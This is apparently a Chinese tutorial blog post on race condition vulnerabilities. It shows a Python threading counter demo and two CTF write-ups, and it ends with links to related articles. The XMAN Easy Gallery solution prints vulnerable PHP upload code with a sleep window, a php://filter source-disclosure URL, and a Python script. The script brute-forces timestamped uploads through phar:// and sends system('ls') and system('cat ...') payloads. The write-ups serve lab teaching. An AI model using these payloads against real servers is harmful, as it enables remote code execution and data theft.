条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同用户的请求时是并发进行的,因此,如果并发处理不当或相关操作逻辑顺序设计的不合理时,将会导致此类问题的发生。

参考了一些资料,发现一个比较能说明问题的实例。

#-*-coding:utf-8-*-

import threading

COUNT = 0

def Run(threads_name):

    global COUNT

    read_value = COUNT

    print "COUNT in Thread-%s is %d" % (str(threads_name), read_value)

    COUNT = read_value + 1

def main():

    threads = []

    for j in range(10):

        t = threading.Thread(target=Run,args=(j,))

        threads.append(t)

        t.start()

    for i in range(len(threads)):

        threads[i].join()

    print ("Finally, The COUNT is %d" % (COUNT,))

if __name__ == '__main__':

    main()

运行结果:

按照我们的预想,结果应该都是10,但是发现结果可能存在非预期解,并且出现非预期的概率还挺大的。

这是什么原因呢?

原因就在于我们没有对变量COUNT做同步制约,导致可能Thread-7在读COUNT,还没来得及更改COUNT,Thread-8抢夺资源,也来读COUNT,并且将COUNT修改为它读的结果+1,由此出现非预期。

同样的,WEB应用程序因为要为很多用户服务,势必要采用多线程,但是,如果种种原因导致线程间的同步机制没处理好,那么也就会导致非预期和条件竞争的漏洞。

条件竞争在CTF中也有过一些题。

1.moctf

打开网址后一直打开的是index2.php 修改为index.php后发现还是会跳转到index2 抓包修改index.php。

发现index.php是一个302网页,因此就可以看到这里存在的一个文件uploadsomething.php。

随便填写文件名下面写入代码,再进行提交。

访问后

因此这里就需要用到条件竞争,不断的向网站发送请求,然后边发送边访问。

写入一个py文件一直发requests即可

import requests

url="http://119.23.73.3:5006/web2/uploads/b106f91010a3789acab1f27a00d67570052a7921/1.php"

while 1:

    print (requests.get(url).text)

2.XMAN-Easy Gallery

伪协议读取代码

http://202.112.51.184:8004/index.php?page=php://filter/read=convert.base64-encode/resource=upload.php
<html lang="zh-CN">

  <head>

    <meta charset="utf-8">

<?php

$error=$_FILES['pic']['error'];

$tmpName=$_FILES['pic']['tmp_name'];

$name=$_FILES['pic']['name'];

$size=$_FILES['pic']['size'];

$type=$_FILES['pic']['type'];

try{

    if($name!=="")

    {

        $name1=substr($name,-4);

        if(($name1!==".gif") and ($name1!==".jpg"))

        {

            echo "hehe";

            echo "<script language=javascript>alert('不允许的文件类型!');history.go(-1)</script>";

            exit;

        }

        if($type!=="image/jpeg"&&$type!=="image/gif")

        {

            echo mime_content_type($tmpName);

            echo "<script language=javascript>alert('不允许的文件类型!');history.go(-1)</script>";

            exit;

        }

        if(is_uploaded_file($tmpName)){

            $time=time();

            $rootpath='uploads/'.$time.$name1;

            if(!move_uploaded_file($tmpName,$rootpath)){

                echo "<script language='JavaScript'>alert('文件移动失败!');window.location='index.php?page=submit'</script>";

                exit;

            }

            else{

                sleep(5);

                if ($type=='image/jpeg')

                {

                    $im = @imagecreatefromjpeg($rootpath);

                    if(!$im){

                      $im = imagecreatetruecolor(150, 30);

                      $bg = imagecolorallocate($im, 255, 255, 255);

                      $text_color = imagecolorallocate($im, 0, 0, 255);

                      imagefilledrectangle($im, 0, 0, 150, 30, $bg);

                      imagestring($im, 3, 5, 5, "Error loading image", $text_color);

                    } else {

                        $time=time();

                        $new_rootpath='uploads/'.$time.$name1;

                        imagejpeg($im,$new_rootpath);

                    }

                }

                else if ($type=='image/gif')

                {

                    $im = @imagecreatefromgif($rootpath);

                    if(!$im){

                      $im = imagecreatetruecolor(150, 30);

                      $bg = imagecolorallocate($im, 255, 255, 255);

                      $text_color = imagecolorallocate($im, 0, 0, 255);

                      imagefilledrectangle($im, 0, 0, 150, 30, $bg);

                      imagestring($im, 3, 5, 5, "Error loading image", $text_color);

                    } else {

                        $time=time();

                        $new_rootpath='uploads/'.$time.$name1;

                        imagegif($im,$new_rootpath);

                    }

                }

                unlink($rootpath);

            }

        }

        echo "图片ID:".$time;

    }

}

catch(Exception $e)

{

    echo "ERROR";

}

//

 ?>

 </html>

首先是验证上传的文件是否为图片格式,如果上传了正确的图片,imagecreatefromjpeg()返回图像资源,文件名更换为新的时间戳,用新的文件路径$new_rootpath输出图片,最后删除原文件unlink($rootpath);如果上传了不正确的图片,不会更换新的文件路径,最后还要删除源文件unlink($rootpath);上传过程中存在一个延时函数sleep(5),所以上传的文件即使验证不成功也有5秒钟的时间存在。

解法:

随后用Python访问链接

import requests

import time

id = int(time.time())

s=requests.session()

data0={'v':"phpinfo();",}

data1={

    'v':"system('ls');"

}

data2={

    'v':"system('cat xxxxxxxxxasdasf_flag.php');"

}

while 1:

    for i in range(id-50,id+50):

        url = 'http://202.112.51.184:9005/index.php?page=phar://./uploads/' + str(i) + '.jpg/v'

        t=s.post(url,data=data1).content

        print i

        if 'flag' in t:

            print t

            break
 

条件竞争(race condition)的更多相关文章

  1. 竞态条件 race condition data race

    竞态条件 race condition Race condition - Wikipedia https://en.wikipedia.org/wiki/Race_condition A race c ...

  2. Fortify Audit Workbench 笔记 Race Condition: Singleton Member Field 竞争条件:单例的成员字段

    Race Condition: Singleton Member Field 竞争条件:单例的成员字段 Abstract Servlet 成员字段可能允许一个用户查看其他用户的数据. Explanat ...

  3. 理解竞争条件( Race condition)漏洞

    这几天一个叫做"Dirty COW"的linux内核竞争条件漏洞蛮火的,相关公司不但给这个漏洞起了个洋气的名字,还给它设计了logo(见下图),首页,Twitter账号以及网店.恰 ...

  4. Operating System-进程/线程内部通信-竞争条件(Race Conditions)

    从本文开始介绍进程间的通信,进程间通信遇到的问题以及方式其实和线程之间通信是一致的,所以进程间通信的所有理论知识都可以用在线程上,接下来的系列文章都会以进程之间的通信为模版进行介绍,本文主要内容: 进 ...

  5. Race condition

    在很多门课上都接触到race condition, 其中也举了很多方法解决这个问题.于是想来总结一下这些方法. Race condition 它旨在描述一个系统或者进程的输出依赖于不受控制的事件出现顺 ...

  6. 【多线程同步案例】Race Condition引起的性能问题

    Race Condition(也叫做资源竞争),是多线程编程中比较头疼的问题.特别是Java多线程模型当中,经常会因为多个线程同时访问相同的共享数据,而造成数据的不一致性.为了解决这个问题,通常来说需 ...

  7. MySQL/MariaDB/PerconaDB-提权条件竞争漏洞

    背景 2016年11月01日,国外安全研究员Dawid Golunski在 MySQl, MariaDB 和 PerconaDB 数据库中发现条件竞争漏洞,该漏洞允许本地用户使用低权限(CREATE/ ...

  8. 第8章 用户模式下的线程同步(4)_条件变量(Condition Variable)

    8.6 条件变量(Condition Variables)——可利用临界区或SRWLock锁来实现 8.6.1 条件变量的使用 (1)条件变量机制就是为了简化 “生产者-消费者”问题而设计的一种线程同 ...

  9. c++并发编程之条件变量(Condition Variable)

    条件变量(Condition Variable)的一般用法是:线程 A 等待某个条件并挂起,直到线程 B 设置了这个条件,并通知条件变量,然后线程 A 被唤醒.经典的「生产者-消费者」问题就可以用条件 ...

随机推荐

  1. 和菜鸟一起学linux之DBUS基础学习记录(转)

    转自:https://www.cnblogs.com/wuyida/p/6299998.html D-Bus三层架构 D-Bus是一个为应用程序间通信的消息总线系统, 用于进程之间的通信.它是个3层架 ...

  2. hashCode竟然不是根据对象内存地址生成的?还对内存泄漏与偏向锁有影响?

    起因 起因是群里的一位童鞋突然问了这么问题: 如果重写 equals 不重写 hashcode 会有什么影响? 这个问题从上午10:45 开始陆续讨论,到下午15:39 接近尾声 (忽略这形同虚设的马 ...

  3. 011_go语言中的range遍历

    代码演示 package main import "fmt" func main() { nums := []int{2, 3, 4} sum := 0 for _, num := ...

  4. Spring IOC 启动过程

    1. 引言 本篇博文主要介绍 IOC 容器的启动过程,启动过程分为两个步骤,第一个阶段是容器的启动阶段,第二个阶段是 Bean 实例化阶段,这两个阶段各自需要执行的步骤如下图,接下来会一一介绍. 需要 ...

  5. C语言基础printf()和scanf()函数

    在程序的运行中,我们经常会进行一些输入输出的操作,用来实现交互.为此, C语言便给出了 printf() 函数和 scanf() 函数用来实现输入和输出两个动作. 其中,printf()函数用于向控制 ...

  6. C#LeetCode刷题之#160-相交链表(Intersection of Two Linked Lists)

    问题 该文章的最新版本已迁移至个人博客[比特飞],单击链接 https://www.byteflying.com/archives/3824 访问. 编写一个程序,找到两个单链表相交的起始节点. 例如 ...

  7. 简单认识Adam优化器

    转载地址 https://www.jianshu.com/p/aebcaf8af76e 基于随机梯度下降(SGD)的优化算法在科研和工程的很多领域里都是极其核心的.很多理论或工程问题都可以转化为对目标 ...

  8. 题解 洛谷P3469

    题目每个割点去掉后会导致多少对点不能连通 考虑跑Tarjan的时候记录每个儿子的size,那么去掉这个割点后其他的点都不能和这个儿子连通 注意每个点去掉后它本身就不能与其他所有点连通 还有就是题目里求 ...

  9. 第三章 kubernetes核心原理

    kubernetes API Server 提供了Kubernetes各类资源对象(如pod,re,service等)的增删改查及watch等Http Rest接口,成为集群内各个功能模块之间数据交互 ...

  10. andriod开发中遇到的错误

    1.java.net.UnknownServiceException: CLEARTEXT communication ** not permitted by network security pol ...